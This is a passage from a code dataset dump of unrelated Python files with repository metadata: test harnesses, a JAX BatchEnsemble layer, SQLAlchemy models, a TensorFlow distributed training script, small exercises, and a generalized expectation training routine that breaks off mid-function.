Ticket( 2000 );\n for who in JAMES, MOHAN, LINUS:\n try:\n print( \"TEST: calling 'anyone' function as\", who )\n print( anyone( tickets[ who ], who ) )\n except SecurityBreach as e:\n print( e )\n try:\n print( \"TEST: calling 'mgr_admin' function as\", who )\n mgr_admin( tickets[ who ], 1000 )\n except SecurityBreach as e:\n print( e )\n try:\n print( \"TEST: calling 'admin_only' function as\", who )\n print( \"3 + 11 = \" + str( admin_only( tickets[ who ], 3, 11 ) ) )\n except SecurityBreach as e:\n print( e )\n\nif __name__ == '__main__':\n test1()\n","sub_path":"AspectProgramming/Lab4/privilege_test_1.py","file_name":"privilege_test_1.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172842133","text":"\"\"\"Test case implementation\"\"\"\n\nimport unittest\n\n\nclass StaticTestCase(unittest.TestCase):\n\n @staticmethod\n def assertParameterInit(sbml):\n \"\"\"\n Checks whether the parameter values have been initialized\n Parameter values are considered unset if a model does not contain\n a setting for the \"value\" attribute of a parameter, nor does it has\n a default value\n :param sbml: a simple_sbml representation of the model\n :return: True iff all of the parameters have been initialized\n \"\"\"\n # iterate through all of the parameters\n for parameter in sbml.parameters:\n if not parameter.isSetValue():\n return False\n return True\n\n @staticmethod\n def assertParameterValNotZero(sbml):\n \"\"\"\n Checks whether the parameter value is initialized, and is a non-zero number\n :param sbml: a simple_sbml representation of the model\n :param an_id: string representation of the id\n :return: True iff the value is initialized, and is a non-zero number\n False iff the value is initialized, but is set to zero\n None if the value is not initialized\n \"\"\"\n for parameter in sbml.parameters:\n if not parameter.isSetValue():\n return None\n elif parameter.getValue() == 0:\n return False\n return True\n\n @staticmethod\n def assertSpeciesInit(sbml):\n \"\"\"\n Checks whether the values of all chemical species referenced in a\n kinetics law has been initialized\n :param sbml: a simple_sbml representation of the model\n :return: True iff all of the species referenced in the kinetics law\n has been initialized\n \"\"\"\n reactions = sbml.reactions # get all of the reactions involved\n for reaction in reactions:\n # get all of the parameters' and species' names involved in the reaction\n symbols = reaction.kinetic_law._getSymbols()\n for symbol in symbols:\n species = sbml.getSpecies(symbol)\n # skip all of the parameters, see assertParameterInit for parameter testing\n if species is None:\n continue\n if not species.isSetInitialConcentration(): # initial amount\n return False\n return True\n\n # kinetics expression\n # A + B -> C; k1*A*B, mass action\n # A + B + C -> D; k1*A*B, counter\n # A + B -> C; k1*C, c starts non-zero, or another action in place\n # symbols -> also reactants in the reaction and all reactants in the reaction are symbols\n # could be exceptions\n # warnings and failures\n\n # networkx\n","sub_path":"src/km_test.py","file_name":"km_test.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"381963722","text":"# coding=utf-8\n# Copyright 2021 The Edward2 Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Uncertainty-based dense layers in JAX.\"\"\"\n\nfrom typing import Iterable, Callable, Optional\n\nimport flax.linen as nn\nimport jax.numpy as jnp\n\nDType = type(jnp.float32)\nInitializeFn = Callable[[jnp.ndarray, Iterable[int], DType], jnp.ndarray]\n\n\nclass DenseBatchEnsemble(nn.Module):\n \"\"\"A batch ensemble dense layer.\n\n Attributes:\n features: the number of output features.\n ens_size: the number of ensemble members.\n activation: activation function.\n use_ensemble_bias: whether to add a bias to the BE output (default: True).\n dtype: the dtype of the computation (default: float32).\n kernel_init: initializer function for the weight matrix.\n bias_init: initializer function for the bias.\n \"\"\"\n features: int\n ens_size: int\n activation: Optional[Callable[[jnp.ndarray], jnp.ndarray]] = None\n use_ensemble_bias: bool = True\n dtype: Optional[DType] = None\n alpha_init: InitializeFn = nn.initializers.ones\n gamma_init: InitializeFn = nn.initializers.ones\n kernel_init: InitializeFn = nn.initializers.xavier_uniform()\n bias_init: InitializeFn = nn.initializers.zeros\n\n @nn.compact\n def __call__(self, inputs):\n \"\"\"Applies layer to input.\n\n Args:\n inputs: jnp.ndarray of shape [ens_size * batch_size, ..., input_dim].\n\n Returns:\n jnp.ndarray of shape [ens_size * batch_size, ..., features].\n \"\"\"\n dtype = self.dtype or inputs.dtype\n inputs = jnp.asarray(inputs, dtype)\n input_dim = inputs.shape[-1]\n\n kernel = self.param('kernel', self.kernel_init, (input_dim, self.features),\n dtype)\n alpha = self.param('fast_weight_alpha', self.alpha_init,\n (self.ens_size, input_dim), dtype)\n gamma = self.param('fast_weight_gamma', self.gamma_init,\n (self.ens_size, self.features), dtype)\n\n inputs_shape = inputs.shape\n inputs = jnp.reshape(inputs, (self.ens_size, -1) + inputs_shape[1:])\n outputs = jnp.einsum('E...C,EC,CD,ED->E...D', inputs, alpha, kernel, gamma)\n\n if self.use_ensemble_bias:\n bias = self.param('bias', self.bias_init, (self.ens_size, self.features),\n dtype)\n bias_shape = (self.ens_size,) + (1,) * (outputs.ndim - 2) + (\n self.features,)\n outputs = outputs + jnp.reshape(bias, bias_shape)\n\n if self.activation is not None:\n outputs = self.activation(outputs) # pylint: disable=not-callable\n\n return jnp.reshape(outputs, inputs_shape[:-1] + (self.features,))\n","sub_path":"edward2/jax/nn/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145284103","text":"import json\n\nwith open('cities.json') as d:\n\tcity = json.load(d)\nwith open('city_detailed.json') as d:\n\tcity_d = json.load(d)\ni=0\nx=[]\nfor c in city:\n\tif c['name'].lower() in city_d.keys():\n\t\tx.append({})\n\t\tx[i]['name'] = c['name'].lower()\n\t\tx[i]['lat'] = city_d[c['name'].lower()]['latitude']\n\t\tx[i]['long'] = city_d[c['name'].lower()]['longitude']\n\t\tx[i]['state'] = c['state'].lower()\n\t\ti+=1\nwith open('city_merged.json','w') as d:\n\t json.dump(x,d)\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625551929","text":"from sqlalchemy import Column, Integer, String, DateTime, ForeignKey, func\nfrom sqlalchemy.orm import relationship, class_mapper\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom web.database import Base\n\nclass AppBase(Base):\n __abstract__ = True\n __table_args__ = {'extend_existing': True}\n\n created_at = Column(DateTime(timezone=True), default=func.now())\n updated_at = Column(DateTime(timezone=True), default=func.now())\n\n def to_dict(self):\n cls = self.__class__\n convert = dict()\n d = dict()\n for c in cls.__table__.columns:\n v = getattr(self, c.name)\n if c.type in convert.keys() and v is not None:\n try:\n d[c.name] = convert[c.type](v)\n except:\n d[c.name] = \"Error: Failed to covert using \", str(convert[c.type])\n elif v is None:\n d[c.name] = str()\n else:\n d[c.name] = v\n return d\n\n\n# CREATE TABLE authors (\n# id UUID DEFAULT uuid_generate_v4(),\n# name VARCHAR(100) COLLATE \"ja-x-icu\" NOT NULL,\n# name_kana VARCHAR(100) COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id)\n# );\nclass Author(AppBase):\n __tablename__ = \"authors\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n name = Column(String(collation='ja-x-icu'), nullable=False)\n name_kana = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n fake_authors = relationship(\"FakeAuthor\", backref=\"authors\") # Has many\n books = relationship(\"Book\", backref=\"authors\") # Has many\n\n def __init__(self, name, name_kana):\n self.name = name\n self.name_kana = name_kana\n\n# CREATE TABLE books (\n# id UUID DEFAULT uuid_generate_v4(),\n# author_id UUID NOT NULL,\n# title VARCHAR(250) COLLATE \"ja-x-icu\" NOT NULL,\n# url VARCHAR(250) NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_author\n# FOREIGN KEY(author_id)\n# REFERENCES authors(id)\n# );\nclass Book(AppBase):\n __tablename__ = \"books\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n author_id = Column(UUID(as_uuid=True), ForeignKey('authors.id'))\n title = Column(String(collation='ja-x-icu'), nullable=False)\n url = Column(String(), nullable=False)\n\n # Relation\n author = relationship(\"Author\", back_populates=\"books\") # Has One\n quotes = relationship(\"Quote\", backref=\"books\") # Has Many\n fake_books = relationship(\"FakeBook\", backref=\"books\") # Has Many\n\n def __init__(self, title, url):\n self.title = title\n self.url = url\n\n\n\n# CREATE TABLE quotes (\n# id UUID DEFAULT uuid_generate_v4(),\n# book_id UUID NOT NULL,\n# text TEXT COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_book\n# FOREIGN KEY(book_id)\n# REFERENCES books(id)\n# );\nclass Quote(AppBase):\n __tablename__ = \"quotes\"\n __table_args__ = {'extend_existing': True}\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n book_id = Column(UUID(as_uuid=True), ForeignKey('books.id'))\n text = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n book = relationship(\"Book\", back_populates=\"quotes\") # Has One\n fake_quotes = relationship(\"FakeQuote\", backref=\"quotes\") # Has Many\n\n def __init__(self, text):\n self.text = text\n\n\n# CREATE TABLE fake_authors (\n# id UUID DEFAULT uuid_generate_v4(),\n# author_id UUID NOT NULL,\n# name varchar(100) COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_original_author\n# FOREIGN KEY(author_id)\n# REFERENCES authors(id)\n# );\nclass FakeAuthor(AppBase):\n __tablename__ = \"fake_authors\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n author_id = Column(UUID(as_uuid=True), ForeignKey('authors.id'))\n name = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n original_author = relationship(\"Author\", back_populates=\"fake_authors\") # Has One\n fake_books = relationship(\"FakeBook\", backref=\"fake_authors\") # Has Many\n\n def __init__(self, author_id, name):\n self.author_id = author_id\n self.name = name\n\n\n# CREATE TABLE fake_books (\n# id UUID DEFAULT uuid_generate_v4(),\n# book_id UUID NOT NULL,\n# fake_author_id UUID NOT NULL,\n# title VARCHAR(250) COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_original_book\n# FOREIGN KEY(book_id)\n# REFERENCES books(id),\n# CONSTRAINT fk_fake_author\n# FOREIGN KEY(fake_author_id)\n# REFERENCES fake_authors(id)\n# );\nclass FakeBook(AppBase):\n __tablename__ = \"fake_books\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n book_id = Column(UUID(as_uuid=True), ForeignKey('books.id'))\n fake_author_id = Column(UUID(as_uuid=True), ForeignKey('fake_authors.id'))\n title = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n original_book = relationship(\"Book\", back_populates=\"fake_books\") # Has One\n fake_author = relationship(\"FakeAuthor\", back_populates=\"fake_books\") # Has One\n fake_quotes = relationship(\"FakeQuote\", backref=\"fake_books\") # Has Many\n\n def __init__(self, book_id, title):\n self.book_id = book_id\n self.title = title\n\n\n# CREATE TABLE fake_quotes (\n# id UUID DEFAULT uuid_generate_v4(),\n# quote_id UUID NOT NULL,\n# fake_book_id UUID NOT NULL,\n# text TEXT COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_original_quote\n# FOREIGN KEY(quote_id)\n# REFERENCES quotes(id),\n# CONSTRAINT fk_fake_book\n# FOREIGN KEY(fake_book_id)\n# REFERENCES fake_books(id)\n# );\nclass FakeQuote(AppBase):\n __tablename__ = \"fake_quotes\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n quote_id = Column(UUID(as_uuid=True), ForeignKey('quotes.id'))\n fake_book_id = Column(UUID(as_uuid=True), ForeignKey('fake_books.id'))\n text = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n original_quote = relationship(\"Quote\", back_populates=\"fake_quotes\") # Has One\n fake_book = relationship(\"FakeBook\", back_populates=\"fake_quotes\") # Has One\n\n def __init__(self, quote_id, text):\n self.quote_id = quote_id\n self.text = text\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328130410","text":"# Week 1 quiz\n\ndef binary_to_decimal(num):\n \"\"\"\n This function converts a binary number to its corresponding decimal number\n Iterate through the length of the binary number and based on the position, square the digit\n \"\"\"\n\n #separate the number into digits\n digits = [int(x) for x in str(num)]\n decimal = 0\n\n #multiply each digit by the square of its position\n for i in range(len(digits)):\n decimal += (2**i) * digits[i]\n\n #can also just use the int function\n #decimal = int(str(num), 2)\n\n return decimal\n\nassert binary_to_decimal(1001) == 9\n\n","sub_path":"binary/binary_to_decimal.py","file_name":"binary_to_decimal.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570024957","text":"#!/usr/bin/env python\n\"\"\"\nUsage:\n\nTF_CONFIG='{\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 0, \"type\": \"ps\"}}' python -m trainer.task\nTF_CONFIG='{\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 0, \"type\": \"worker\"}}' python -m trainer.task\nTF_CONFIG='{\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 1, \"type\": \"worker\"}}' python -m trainer.task\n\"\"\"\n\nimport datetime\nimport json\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nflags = tf.app.flags\nflags.DEFINE_integer(\"epoch_number\", 10, \"Number of steps to run trainer\")\nflags.DEFINE_string(\"checkpoint_dir\", \"./checkpoint/\",\n \"The checkpoint directory\")\nflags.DEFINE_float(\"learning_rate\", 0.01, \"Initial learning rate\")\nFLAGS = flags.FLAGS\n\n\ndef main():\n # Create train dataset\n train_X = np.linspace(-1, 1, 100).reshape((100, 1))\n train_Y = 2 * train_X + np.random.randn(*train_X.shape) * 0.33 + 10\n optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)\n start_training_time = datetime.datetime.now()\n\n # Run standalone training\n if os.environ.get('TF_CONFIG', \"\") == \"\":\n X_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n Y_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n w = tf.get_variable(\"w\", [1], initializer=tf.random_normal_initializer())\n b = tf.get_variable(\"b\", [1], initializer=tf.random_normal_initializer())\n loss = tf.reduce_sum(tf.square(Y_placeholder - X_placeholder * w - b))\n global_step = tf.Variable(0, name='global_step', trainable=False)\n train_op = optimizer.minimize(loss, global_step=global_step)\n init_op = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init_op)\n\n for epoch_index in range(FLAGS.epoch_number):\n _, loss_value = sess.run(\n [train_op, loss],\n feed_dict={X_placeholder: train_X,\n Y_placeholder: train_Y})\n\n if epoch_index % 1 == 0:\n print(\"Epoch: {}, loss: {}\".format(epoch_index, loss_value))\n\n w_value, b_value = sess.run([w, b])\n end_training_time = datetime.datetime.now()\n print(\"[{}] End of standalone training, w: {}, b:{}\".format(\n end_training_time - start_training_time, w_value, b_value))\n\n # Run distributed training\n else:\n # Exampmle: {\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 0, \"type\": \"worker\"}}\n tf_config_env = json.loads(os.environ.get(\"TF_CONFIG\"))\n cluster_spec = tf_config_env.get(\"cluster\")\n task_data = tf_config_env.get(\"task\")\n task_type = task_data.get(\"type\")\n task_index = task_data.get(\"index\")\n\n cluster = tf.train.ClusterSpec(cluster_spec)\n server = tf.train.Server(\n cluster, job_name=task_type, task_index=task_index)\n\n if task_type == \"ps\":\n server.join()\n elif task_type == \"worker\":\n\n with tf.device(\n tf.train.replica_device_setter(\n worker_device=\"/job:worker/task:{}\".format(task_index),\n cluster=cluster)):\n\n X_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n Y_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n w = tf.get_variable(\n \"w\", [1], initializer=tf.random_normal_initializer())\n b = tf.get_variable(\n \"b\", [1], initializer=tf.random_normal_initializer())\n loss = tf.reduce_sum(tf.square(Y_placeholder - X_placeholder * w - b))\n global_step = tf.train.get_or_create_global_step()\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n config = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False,\n device_filters=[\"/job:ps\", \"/job:worker/task:%d\" % task_index]\n )\n\n # hooks=[tf.train.StopAtStepHook(last_step=100)]\n is_chief = task_index == 0\n with tf.train.MonitoredTrainingSession(\n master=server.target,\n config=config,\n is_chief=is_chief,\n checkpoint_dir=FLAGS.checkpoint_dir) as sess:\n while not sess.should_stop():\n\n for epoch_index in range(FLAGS.epoch_number):\n _, loss_value = sess.run(\n [train_op, loss],\n feed_dict={X_placeholder: train_X,\n Y_placeholder: train_Y})\n\n if epoch_index % 1 == 0:\n print(\"Epoch: {}, loss: {}\".format(epoch_index, loss_value))\n\n w_value, b_value = sess.run([w, b])\n end_training_time = datetime.datetime.now()\n print(\"[{}] End of standalone training, w: {}, b:{}\".format(\n end_training_time - start_training_time, w_value, b_value))\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"trainer/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"146860641","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nВы — разработчик игры и у вас есть три уровня.\nЗа их прохождение даётся различное кол-во очков,\nоно указано в mult_round = (100, 300, 550).\n\nВам необходимо написать функцию, которая будет считать\nтрёх игроков с максимальным счётом.\n\nНа вход идёт словарь типа :\n - Имя игрока: результаты раунда (массив).\n\nМассив может быть разным из-за ошибки вычисления или\nесли игрок вышел во время раунда\n(пустой массив или меньше трёх элементов).\n\nПодсчёт идёт за счёт перемножения количества убитых\nврагов и количества очков за раунд.\n\ndata = {'player1': [4, 2, 3], 'player2': [9, 0, 5], 'player3': [19, 0], 'player4': []}\nget_winners(data) -> ['player2', 'player1', 'player3']\n\ndata = {'player1': [4, 2, 3, 6], 'player2': [], 'player3': [19, 0], 'player4': []}\nget_winners(data) -> ['player1', 'player3']\n\"\"\"\n\nmult_round = (100, 300, 550)\n\ndef get_winners(data: dict) -> list:\n # Проход по всем ключам и значениям словаря.\n for key, value in data.items():\n # Каждому ключу присваивается результат вычислений очков.\n data[key] = sum(item1 * item2\n for item1, item2 in zip(mult_round, value))\n\n # Добавление в список значений.\n return [item\n # Проход по ключам словаря отсортированных по их значениям\n # в убывающем порядке.\n for item in sorted(data, key=data.get, reverse=True)\n # Фильтрация ключей, будут добавлены если их значения больше нуля.\n # И делается срез по первым трём элементам.\n if data.get(item)][:3]\n\n\n\ntests = (({'player1': [4, 2, 3], 'player2': [9, 0, 5], 'player3': [19, 0], 'player4': []},\n ['player2', 'player1', 'player3']),\n\n ({'player1': [4, 2, 3, 6], 'player2': [], 'player3': [19, 0], 'player4': []},\n ['player1', 'player3']))\n\nfor data, check in tests:\n print(get_winners(data=data) == check)\n\n","sub_path":"easy/get_winners.py","file_name":"get_winners.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"407143334","text":"from typing import List\n\n\nclass Solution:\n def countNegatives(self, grid: List[List[int]]) -> int:\n sum = 0\n # loop through the rows\n for i in range(len(grid)):\n # for each row find the index of the first positive number and increment len(row)\n row_length = len(grid[i])\n\n for j in range(row_length):\n # find a negative number iterating from the front\n if grid[i][j] < 0:\n # print(\"value is neg\")\n # get the remaining number of elements in the array\n sum += row_length - j\n # print(\"sum\", sum)\n break\n # print(sum)\n return sum\n\n\nm = Solution()\n\nprint(\n \"sol:\",\n m.countNegatives(\n [[4, 3, 2, -1], [3, 2, 1, -1], [1, 1, -1, -2], [-1, -1, -2, -3]]\n ), # should yield 8\n)\n","sub_path":"python/problems/count-negative-numbers-in-a-sorted-matrix/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"396457128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 18 13:38:47 2016\n\n@author: zhengyaolin\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n self.level = []\n if root is not None:\n self.search([root])\n return self.level\n \n def search(self, nodes):\n children = []\n val = []\n for node in nodes:\n val.append(node.val)\n left = node.left\n right = node.right\n if left is not None:\n children.append(left)\n if right is not None:\n children.append(right)\n self.level.append(val)\n if len(children) != 0:\n self.search(children)\n \n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n self.level = []\n if root is not None:\n self.search([root])\n self.level.reverse()\n return self.level\n \n \n \n ","sub_path":"LeetCode/BTLevelOrderTraversal.py","file_name":"BTLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"369661712","text":"#!/usr/bin/env python3\n\nimport argparse, subprocess, sys, os, time, socket\n\nif len(sys.argv) == 1:\n sys.argv.append('-h')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('size', type=str)\nargs = vars(parser.parse_args())\n\ntarget = 'site'\nsize = args['size']\n\nsubprocess.call('./util/prepare.sh', stdout=subprocess.PIPE)\n\nstart = time.time()\n\ncmd = 'util/parallelizer.py -s 24 converter/{target}.py tr.r{size}.site.csv va.r{size}.site.csv tr.r{size}.{target}.sp va.r{size}.{target}.sp'.format(size=size, target=target)\nsubprocess.call(cmd.split())\n\nprint('r{0} time used = {1:.0f}'.format(size, time.time()-start))\n\ncmd = './mark1 -r 0.05 -s 24 -t 3 va.r{size}.{target}.sp tr.r{size}.{target}.sp'.format(size=size, target=target) \nsubprocess.call(cmd.split())\n\ncmd = './util/pickle_prediction.py va.r{size}.{target}.sp.prd va.r{size}.{target}.sp.prd.pickle'.format(size=size, target=target) \nsubprocess.call(cmd.split())\n","sub_path":"Handson-ML/kaggle/avazu_ctr_pred/1st Solution/base/run/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"593410658","text":"import unittest\nimport requests\nimport json\nimport random\nfrom common.excel import DoExcel\nfrom common.readconfig import ConfigLoader\nfrom common.request import Http_Request\nfrom common.os_path import QuanZi_case_dir\nfrom ddt import ddt,data,unpack\nfrom common.mysql_uitl import MysqlUtil\n\n\n\n@ddt\nclass new_quanzi(unittest.TestCase):\n quanzi_case = DoExcel(QuanZi_case_dir).get_case(\"新增圈子\")\n\n\n @classmethod\n def setUpClass(cls):\n global mysql\n mysql = MysqlUtil()\n sql = \"select * from message.message_circle where id != '' order by id desc limit 1; \"\n\n global max_uuid\n max_uuid = mysql.fetch_one(sql)['id'] # 事先查出来圈子表中最新的id,也就是最新的那个圈子\n\n\n @data(*quanzi_case)\n def test_01(self,case):\n # 必要数据的处理\n header = json.loads(ConfigLoader().get('header', 'header_value'))\n data = json.loads(case.data)\n\n # 接口参数的值随机选\n data['title'] = data['title'] + str(random.randint(0,550)) # 圈子名字拼接,降低名字重复的几率\n data['base_join_num'] = str(random.randint(100,1500)) # 圈子加入人数初始值,取个随机数\n\n\n print((\"用例id:{0},用例标题:{1}\".format(case.case_id,case.title)))\n try:\n res = Http_Request(case.method,case.url,data,headers=header)\n except Exception as e:\n print(\"请求时报错:%s\"%e)\n raise e\n # 断言\n result = res.get_json()\n print(\"请求结果:%s\"%result)\n\n if result['success'] == 'True': #如果接口返回True\n # 接口成功,对应的数据库圈子表中id要+1\n expected = max_uuid+1 # 期望结果\n self.assertEqual(expected,mysql.fetch_one(\"select * from message.message_circle where id != '' order by id desc limit 1; \")['id'])\n\n def test_02(self):\n pass\n\n @classmethod\n def tearDownClass(cls):\n mysql.close()\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pro_api/web_QuanZi_case/web_a_new_QuanZi.py","file_name":"web_a_new_QuanZi.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252003481","text":"import numpy as np\r\nfrom train_classifier import logistic\r\nfrom scipy.optimize import minimize, check_grad\r\nfrom sklearn.metrics import accuracy_score\r\n\r\ndef compute_reference_distribution(labels, weak_signal):\r\n\t\"\"\"\r\n\tComputes the score value of the reference expectation\r\n\r\n\t:param labels: size n labels for each instance in the dataset\r\n\t:type labels: array\r\n\t:param weak_signal: weak signal trained using one dimensional feature\r\n\t:type weak_signal: array\r\n\t:return: tuple containing scalar values of positive and negative reference probability distribution\r\n\t:rtype: float\r\n\t\"\"\"\r\n\tthreshold = 0.5\r\n\tpositive_index = np.where(weak_signal >= threshold)\r\n\tnegative_index = np.where(weak_signal < threshold)\r\n\tpos_feature_labels = labels[positive_index]\r\n\tneg_feature_labels = labels[negative_index]\r\n\r\n\ttry:\r\n\t with np.errstate(all='ignore'):\r\n\t \treference_pos_probability = np.sum(pos_feature_labels) / pos_feature_labels.size\r\n\t \treference_neg_probability = np.sum(neg_feature_labels) / neg_feature_labels.size\r\n\texcept:\r\n\t\treference_pos_probability = np.nan_to_num(np.sum(pos_feature_labels) / pos_feature_labels.size) + 0\r\n\t\treference_neg_probability = np.nan_to_num(np.sum(neg_feature_labels) / neg_feature_labels.size) + 0\r\n\r\n\treturn reference_pos_probability, reference_neg_probability\r\n\r\n\r\ndef ge_criterion_train(data, labels, weak_signal_probabilities, num_weak_signals, check_gradient=False):\r\n\t\"\"\"\r\n\tTrains generalized expectation criteria\r\n\r\n\t:param data: size (n, d) ndarray containing n examples described by d features each\r\n\t:type data: ndarray\r\n\t:param labels: length n array of the integer class labels\r\n\t:type labels: array\r\n\t:param weak_signal_probabilities: size num_weak_signals x n of the weak signal probabilities\r\n\t:type weak_signal_probabilities: ndarray\r\n\t:param num_weak_signals: the number of weak signal to be used in training\r\n\t:type num_weak_signals: integer\r\n\t:return: the learned model\r\n\t:rtype: array\r\n\t\"\"\"\r\n\r\n\tn, d = data.shape\r\n\tweights = np.random.rand(d)\r\n\r\n\tdef compute_empirical_distribution(est_probability, weak_signal):\r\n\t\t\"\"\"\r\n\t\tComputes the score value of the emperical distribution\r\n\r\n\t\t:param est_probability: size n estimated probabtilities for the instances\r\n\t\t:type labels: array\r\n\t\t:param weak_signal: weak signal trained using one dimensional feature\r\n\t\t:type weak_signal: array\r\n\t\t:return: (tuple of scalar values of the empirical distribution, tuple of index of instances)\r\n\t\t:rtype: tuple\r\n\t\t\"\"\"\r\n\t\tthreshold = 0.5\r\n\t\tpositive_index = np.where(weak_signal >= threshold)\r\n\t\tnegative_index = np.where(weak_signal < threshold)\r\n\t\tpos_feature_labels = est_probability[positive_index]\r\n\t\tneg_feature_labels = est_probability[negative_index]\r\n\r\n\t\ttry:\r\n\t\t with np.errstate(all='ignore'):\r\n\t\t \tempirical_pos_probability = np.sum(pos_feature_labels) / pos_feature_labels.size\r\n\t \t\tempirical_neg_probability = np.sum(neg_feature_labels) / neg_feature_labels.size\r\n\t\texcept:\r\n\t\t\tempirical_pos_probability = np.nan_to_num(np.sum(pos_feature_labels) / pos_feature_labels.size) + 0\r\n\t\t\tempirical_neg_probability = np.nan_to_num(np.sum(neg_feature_labels) / neg_feature_labels.size) + 0\r\n\r\n\t\tempirical_probability = empirical_pos_probability, empirical_neg_probability\r\n\t\tinstances_index = positive_index, negative_index\r\n\t\treturn empirical_probability, 